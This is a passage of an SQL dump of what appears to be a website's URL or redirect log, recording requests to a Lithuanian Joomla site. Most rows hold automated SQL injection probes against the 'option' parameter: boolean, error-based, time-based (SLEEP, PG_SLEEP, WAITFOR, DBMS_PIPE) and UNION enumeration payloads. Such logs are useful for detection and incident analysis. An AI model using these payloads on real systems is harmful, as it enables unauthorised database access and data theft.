00:00:00'),(3024,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 9761=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9761=9761) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC) AND \'Y','','','',1,0,'2019-09-30 11:47:25','0000-00-00 00:00:00'),(3025,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 9761=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9761=9761) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC) AND \'','','','',1,0,'2019-09-30 11:47:56','0000-00-00 00:00:00'),(3026,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 9761=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9761=9761) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)-- OsrY&','','','',1,0,'2019-09-30 11:48:57','0000-00-00 00:00:00'),(3027,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 5035=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5035=5035) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(113)','','','',1,0,'2019-09-30 11:48:58','0000-00-00 00:00:00'),(3028,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 5035=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5035=5035) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(113))','','','',1,0,'2019-09-30 11:49:59','0000-00-00 00:00:00'),(3029,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 5035=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5035=5035) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(113','','','',1,0,'2019-09-30 11:50:00','0000-00-00 00:00:00'),(3030,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 6734=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6734=6734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(113)||CH','','','',1,0,'2019-09-30 11:56:02','0000-00-00 00:00:00'),(3031,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 6734=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6734=6734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(113)||CHR','','','',1,0,'2019-09-30 11:56:33','0000-00-00 00:00:00'),(3032,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 6734=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6734=6734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(113)||C','','','',1,0,'2019-09-30 11:56:34','0000-00-00 00:00:00'),(3033,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 6734=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6734=6734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(113)||CH','','','',1,0,'2019-09-30 11:56:35','0000-00-00 00:00:00'),(3034,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 6734=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6734=6734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(113)||C','','','',1,0,'2019-09-30 11:56:36','0000-00-00 00:00:00'),(3036,'http://www.infotytuvenai.lt/index.php/lt/?option=(SELECT 2764 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(2764=2764,1))),0x7176716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&view=article&id=306','','','',1,0,'2019-09-30 11:57:08','0000-00-00 00:00:00'),(3037,'http://www.infotytuvenai.lt/index.php/lt/?option=(SELECT CONCAT(0x7178786b71,(SELECT (ELT(2886=2886,1))),0x7176716b71))&view=article&id=306','','','',1,0,'2019-09-30 11:57:39','0000-00-00 00:00:00'),(3038,'http://www.infotytuvenai.lt/index.php/lt/?option=(SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6730=6730) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(113))&view=article&id=306','','','',1,0,'2019-09-30 11:59:41','0000-00-00 00:00:00'),(3039,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content);SELECT SLEEP(5)#&view=article&id=306','','','',1,0,'2019-09-30 11:59:41','0000-00-00 00:00:00'),(3040,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content;SELECT SLEEP(5)#&view=article&id=306','','','',1,0,'2019-09-30 11:59:42','0000-00-00 00:00:00'),(3041,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\';SELECT SLEEP(5)#&view=article&id=306','','','',1,0,'2019-09-30 12:00:14','0000-00-00 00:00:00'),(3042,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content%\';SELECT SLEEP(5)#&view=article&id=306','','','',1,0,'2019-09-30 12:00:15','0000-00-00 00:00:00'),(3043,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\';SELECT PG_SLEEP(5)--&view=article&id=306','','','',1,0,'2019-09-30 12:01:46','0000-00-00 00:00:00'),(3044,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content%\';SELECT PG_SLEEP(5)--&view=article&id=306','','','',1,0,'2019-09-30 12:01:48','0000-00-00 00:00:00'),(3045,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content);WAITFOR DELAY \'0:0:5\'--&view=article&id=306','','','',1,0,'2019-09-30 12:01:49','0000-00-00 00:00:00'),(3046,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content;WAITFOR DELAY \'0:0:5\'--&view=article&id=306','','','',1,0,'2019-09-30 12:01:50','0000-00-00 00:00:00'),(3047,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\');WAITFOR DELAY \'0:0:5\'--&view=article&id=306','','','',1,0,'2019-09-30 12:01:51','0000-00-00 00:00:00'),(3048,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\';WAITFOR DELAY \'0:0:5\'--&view=article&id=306','','','',1,0,'2019-09-30 12:01:52','0000-00-00 00:00:00'),(3049,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content%\';WAITFOR DELAY \'0:0:5\'--&view=article&id=306','','','',1,0,'2019-09-30 12:01:53','0000-00-00 00:00:00'),(3050,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(65)||CHR(113)||CHR(102),5) FROM DUAL--&view=article&id=306','','','',1,0,'2019-09-30 12:02:24','0000-00-00 00:00:00'),(3051,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(65)||CHR(113)||CHR(102),5) FROM DUAL--&view=article&id=306','','','',1,0,'2019-09-30 12:02:55','0000-00-00 00:00:00'),(3052,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND SLEEP(5) AND (4531=4531&view=article&id=306','','','',1,0,'2019-09-30 12:03:26','0000-00-00 00:00:00'),(3053,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 7762=(SELECT 7762 FROM PG_SLEEP(5)) AND (\'lopL\'=\'lopL&view=article&id=306','','','',1,0,'2019-09-30 12:06:58','0000-00-00 00:00:00'),(3054,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 7762=(SELECT 7762 FROM PG_SLEEP(5)) AND \'KAsW\'=\'KAsW&view=article&id=306','','','',1,0,'2019-09-30 12:06:59','0000-00-00 00:00:00'),(3055,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 3228=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(78)||CHR(114)||CHR(121),5) AND (\'xiSO\'=\'xiSO&view=article&id=306','','','',1,0,'2019-09-30 12:12:01','0000-00-00 00:00:00'),(3056,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 3228=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(78)||CHR(114)||CHR(121),5) AND \'czOF\'=\'czOF&view=article&id=306','','','',1,0,'2019-09-30 12:12:02','0000-00-00 00:00:00'),(3057,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) ORDER BY 1-- nmyG&view=article&id=306','','','',1,0,'2019-09-30 12:14:03','0000-00-00 00:00:00'),(3058,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL-- KZaa&view=article&id=306','','','',1,0,'2019-09-30 12:14:04','0000-00-00 00:00:00'),(3059,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL-- CmbB&view=article&id=306','','','',1,0,'2019-09-30 12:14:36','0000-00-00 00:00:00'),(3060,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL-- jruK&view=article&id=306','','','',1,0,'2019-09-30 12:15:37','0000-00-00 00:00:00'),(3061,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL-- rFne&view=article&id=306','','','',1,0,'2019-09-30 12:16:38','0000-00-00 00:00:00'),(3062,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- eFTr&view=article&id=306','','','',1,0,'2019-09-30 12:17:08','0000-00-00 00:00:00'),(3063,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- oeXf&view=article&id=306','','','',1,0,'2019-09-30 12:18:10','0000-00-00 00:00:00'),(3064,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GYnm&view=article&id=306','','','',1,0,'2019-09-30 12:18:41','0000-00-00 00:00:00'),(3065,'http://infotytuvenai.lt/index.php/lt/administrator/manifests/files/joomla.xml','','http://sucuri.net','',5,0,'2019-10-07 12:21:59','0000-00-00 00:00:00'),(3066,'http://infotytuvenai.lt/index.php/lt/media/system/js/caption.js','','http://sucuri.net','',2,0,'2019-10-07 12:22:00','0000-00-00 00:00:00'),(3067,'http://infotytuvenai.lt/index.php/lt/modules/custom.xml','','http://sucuri.net','',2,0,'2019-10-07 12:22:01','0000-00-00 00:00:00'),(3068,'http://infotytuvenai.lt/index.php/lt/media/media/js/mediamanager.js','','http://sucuri.net','',4,0,'2019-10-07 12:22:01','0000-00-00 00:00:00'),(3069,'http://infotytuvenai.lt/index.php/lt/includes/js/joomla.javascript.js','','http://sucuri.net','',4,0,'2019-10-07 12:22:02','0000-00-00 00:00:00'),(3070,'http://infotytuvenai.lt/index.php/lt/mambots/editors/tinymce/jscripts/tiny_mce/plugins/flash/editor_plugin.js','','http://sucuri.net','',2,0,'2019-10-07 12:22:02','0000-00-00 00:00:00'),(3071,'http://infotytuvenai.lt/index.php/lt//2019/wp-includes/wlwmanifest.xml','','','',161,0,'2019-10-15 13:22:16','0000-00-00 00:00:00'),(3072,'http://infotytuvenai.lt/index.php/lt/?option=4314&view=article&id=305','','','',1,0,'2019-10-17 12:10:02','0000-00-00 00:00:00'),(3073,'http://infotytuvenai.lt/index.php/lt/?option=3418&view=article&id=305','','','',1,0,'2019-10-17 12:10:03','0000-00-00 00:00:00'),(3074,'http://infotytuvenai.lt/index.php/lt/?option=com_content\'yiFXiD<\'\">PyOyXI&view=article&id=305','','','',1,0,'2019-10-17 12:10:08','0000-00-00 00:00:00'),(3075,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 9609=8223 AND (3598=3598&view=article&id=305','','','',1,0,'2019-10-17 12:10:09','0000-00-00 00:00:00'),(3076,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 6025=6025 AND (6124=6124&view=article&id=305','','','',1,0,'2019-10-17 12:10:10','0000-00-00 00:00:00'),(3077,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 8192=3086&view=article&id=305','','','',1,0,'2019-10-17 12:10:10','0000-00-00 00:00:00'),(3078,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 6025=6025&view=article&id=305','','','',1,0,'2019-10-17 12:10:11','0000-00-00 00:00:00'),(3079,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') AND 9757=1443 AND (\'mmZA\'=\'mmZA&view=article&id=305','','','',1,0,'2019-10-17 12:10:12','0000-00-00 00:00:00'),(3080,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') AND 6025=6025 AND (\'jzIb\'=\'jzIb&view=article&id=305','','','',1,0,'2019-10-17 12:10:13','0000-00-00 00:00:00'),(3081,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' AND 1219=7612 AND \'wxhp\'=\'wxhp&view=article&id=305','','','',1,0,'2019-10-17 12:10:13','0000-00-00 00:00:00'),(3082,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' AND 6025=6025 AND \'jDQn\'=\'jDQn&view=article&id=305','','','',1,0,'2019-10-17 12:10:14','0000-00-00 00:00:00'),(3083,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 2067=5540 AND \'%\'=\'&view=article&id=305','','','',1,0,'2019-10-17 12:10:15','0000-00-00 00:00:00'),(3084,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 6025=6025 AND \'%\'=\'&view=article&id=305','','','',1,0,'2019-10-17 12:10:15','0000-00-00 00:00:00'),(3085,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 5360=1211-- dfhb&view=article&id=305','','','',1,0,'2019-10-17 12:10:16','0000-00-00 00:00:00'),(3086,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 6025=6025-- oWRT&view=article&id=305','','','',1,0,'2019-10-17 12:10:17','0000-00-00 00:00:00'),(3087,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT (CASE WHEN (9959=6276) THEN 9959 ELSE 9959*(SELECT 9959 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&view=article&id=305','','','',1,0,'2019-10-17 12:10:17','0000-00-00 00:00:00'),(3088,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT (CASE WHEN (8148=8148) THEN 8148 ELSE 8148*(SELECT 8148 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&view=article&id=305','','','',1,0,'2019-10-17 12:10:18','0000-00-00 00:00:00'),(3089,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND (SELECT 3843 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(3843=3843,1))),0x7162717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2464=2464&view=articl','','','',1,0,'2019-10-17 12:10:19','0000-00-00 00:00:00'),(3090,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 3843 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(3843=3843,1))),0x7162717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&view=article&id=305','','','',1,0,'2019-10-17 12:10:20','0000-00-00 00:00:00'),(3091,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') AND (SELECT 3843 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(3843=3843,1))),0x7162717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (\'oUuz\'=\'oUuz&view=ar','','','',1,0,'2019-10-17 12:10:21','0000-00-00 00:00:00'),(3092,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' AND (SELECT 3843 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(3843=3843,1))),0x7162717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND \'QzSn\'=\'QzSn&view=arti','','','',1,0,'2019-10-17 12:10:22','0000-00-00 00:00:00'),(3093,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' AND (SELECT 3843 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(3843=3843,1))),0x7162717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND \'%\'=\'&view=article&id','','','',1,0,'2019-10-17 12:10:23','0000-00-00 00:00:00'),(3094,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 3843 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(3843=3843,1))),0x7162717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- qvVH&view=article&id=305','','','',1,0,'2019-10-17 12:10:24','0000-00-00 00:00:00'),(3095,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 7783=CAST((CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7783=7783) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)) AS NUMERIC) AND (2900=2','','','',1,0,'2019-10-17 12:10:25','0000-00-00 00:00:00'),(3096,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 7783=CAST((CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7783=7783) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)) AS NUMERIC)&view=article','','','',1,0,'2019-10-17 12:10:25','0000-00-00 00:00:00'),(3097,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') AND 7783=CAST((CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7783=7783) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)) AS NUMERIC) AND (\'rxUx','','','',1,0,'2019-10-17 12:10:26','0000-00-00 00:00:00'),(3098,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' AND 7783=CAST((CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7783=7783) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)) AS NUMERIC) AND \'dMOU\'=','','','',1,0,'2019-10-17 12:10:27','0000-00-00 00:00:00'),(3099,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 7783=CAST((CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7783=7783) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)) AS NUMERIC) AND \'%\'=\'&','','','',1,0,'2019-10-17 12:10:27','0000-00-00 00:00:00'),(3100,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 7783=CAST((CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7783=7783) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)) AS NUMERIC)-- jJyp&view=','','','',1,0,'2019-10-17 12:10:28','0000-00-00 00:00:00'),(3101,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 6955=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6955=6955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113))) AN','','','',1,0,'2019-10-17 12:10:28','0000-00-00 00:00:00'),(3102,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 6955=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6955=6955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113)))&vie','','','',1,0,'2019-10-17 12:10:29','0000-00-00 00:00:00'),(3103,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') AND 6955=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6955=6955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113))) A','','','',1,0,'2019-10-17 12:10:30','0000-00-00 00:00:00'),(3104,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' AND 6955=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6955=6955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113))) AN','','','',1,0,'2019-10-17 12:10:30','0000-00-00 00:00:00'),(3105,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 6955=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6955=6955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113))) A','','','',1,0,'2019-10-17 12:10:31','0000-00-00 00:00:00'),(3106,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 6955=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6955=6955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113)))-- s','','','',1,0,'2019-10-17 12:10:32','0000-00-00 00:00:00'),(3107,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 3621=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3621=3621) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(113)||CHR(113','','','',1,0,'2019-10-17 12:10:32','0000-00-00 00:00:00'),(3108,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 3621=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3621=3621) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(113)||CHR(113)','','','',1,0,'2019-10-17 12:10:33','0000-00-00 00:00:00'),(3109,'http://infotytuvenai.lt/index.php/lt/?option=com_content\') AND 3621=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3621=3621) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(113)||CHR(11','','','',1,0,'2019-10-17 12:10:33','0000-00-00 00:00:00'),(3110,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' AND 3621=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3621=3621) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(113)||CHR(113','','','',1,0,'2019-10-17 12:10:34','0000-00-00 00:00:00'),(3111,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 3621=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3621=3621) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(113)||CHR(11','','','',1,0,'2019-10-17 12:10:35','0000-00-00 00:00:00'),(3113,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT 2659 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(2659=2659,1))),0x7162717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&view=article&id=305','','','',1,0,'2019-10-17 12:10:36','0000-00-00 00:00:00'),(3114,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CONCAT(0x7170707171,(SELECT (ELT(6818=6818,1))),0x7162717171))&view=article&id=305','','','',1,0,'2019-10-17 12:10:37','0000-00-00 00:00:00'),(3115,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT (CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (9118=9118) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)))&view=article&id=305','','','',1,0,'2019-10-17 12:10:38','0000-00-00 00:00:00'),(3116,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9521=9521) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113))&view=article&id=305','','','',1,0,'2019-10-17 12:10:39','0000-00-00 00:00:00'),(3117,'http://infotytuvenai.lt/index.php/lt/?option=com_content);SELECT SLEEP(5)#&view=article&id=305','','','',1,0,'2019-10-17 12:10:39','0000-00-00 00:00:00'),(3118,'http://infotytuvenai.lt/index.php/lt/?option=com_content;SELECT SLEEP(5)#&view=article&id=305','','','',1,0,'2019-10-17 12:10:40','0000-00-00 00:00:00'),(3119,'http://infotytuvenai.lt/index.php/lt/?option=com_content\');SELECT SLEEP(5)#&view=article&id=305','','','',1,0,'2019-10-17 12:10:40','0000-00-00 00:00:00'),(3120,'http://infotytuvenai.lt/index.php/lt/?option=com_content\';SELECT SLEEP(5)#&view=article&id=305','','','',1,0,'2019-10-17 12:10:41','0000-00-00 00:00:00'),(3121,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\';SELECT SLEEP(5)#&view=article&id=305','','','',1,0,'2019-10-17 12:10:41','0000-00-00 00:00:00'),(3122,'http://infotytuvenai.lt/index.php/lt/?option=com_content);SELECT PG_SLEEP(5)--&view=article&id=305','','','',1,0,'2019-10-17 12:10:42','0000-00-00 00:00:00'),(3123,'http://infotytuvenai.lt/index.php/lt/?option=com_content;SELECT PG_SLEEP(5)--&view=article&id=305','','','',1,0,'2019-10-17 12:10:43','0000-00-00 00:00:00'),(3124,'http://infotytuvenai.lt/index.php/lt/?option=com_content\');SELECT PG_SLEEP(5)--&view=article&id=305','','','',1,0,'2019-10-17 12:10:43','0000-00-00 00:00:00'),(3125,'http://infotytuvenai.lt/index.php/lt/?option=com_content\';SELECT PG_SLEEP(5)--&view=article&id=305','','','',1,0,'2019-10-17 12:10:44','0000-00-00 00:00:00'),(3126,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\';SELECT PG_SLEEP(5)--&view=article&id=305','','','',1,0,'2019-10-17 12:10:44','0000-00-00 00:00:00'),(3127,'http://infotytuvenai.lt/index.php/lt/?option=com_content);WAITFOR DELAY \'0:0:5\'--&view=article&id=305','','','',1,0,'2019-10-17 12:10:45','0000-00-00 00:00:00'),(3128,'http://infotytuvenai.lt/index.php/lt/?option=com_content;WAITFOR DELAY \'0:0:5\'--&view=article&id=305','','','',1,0,'2019-10-17 12:10:46','0000-00-00 00:00:00'),(3129,'http://infotytuvenai.lt/index.php/lt/?option=com_content\');WAITFOR DELAY \'0:0:5\'--&view=article&id=305','','','',1,0,'2019-10-17 12:10:46','0000-00-00 00:00:00'),(3130,'http://infotytuvenai.lt/index.php/lt/?option=com_content\';WAITFOR DELAY \'0:0:5\'--&view=article&id=305','','','',1,0,'2019-10-17 12:10:47','0000-00-00 00:00:00'),(3131,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\';WAITFOR DELAY \'0:0:5\'--&view=article&id=305','','','',1,0,'2019-10-17 12:10:48','0000-00-00 00:00:00'),(3132,'http://infotytuvenai.lt/index.php/lt/?option=com_content);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(108)||CHR(79)||CHR(88),5) FROM DUAL--&view=article&id=305','','','',1,0,'2019-10-17 12:10:48','0000-00-00 00:00:00'),(3133,'http://infotytuvenai.lt/index.php/lt/?option=com_content;SELECT 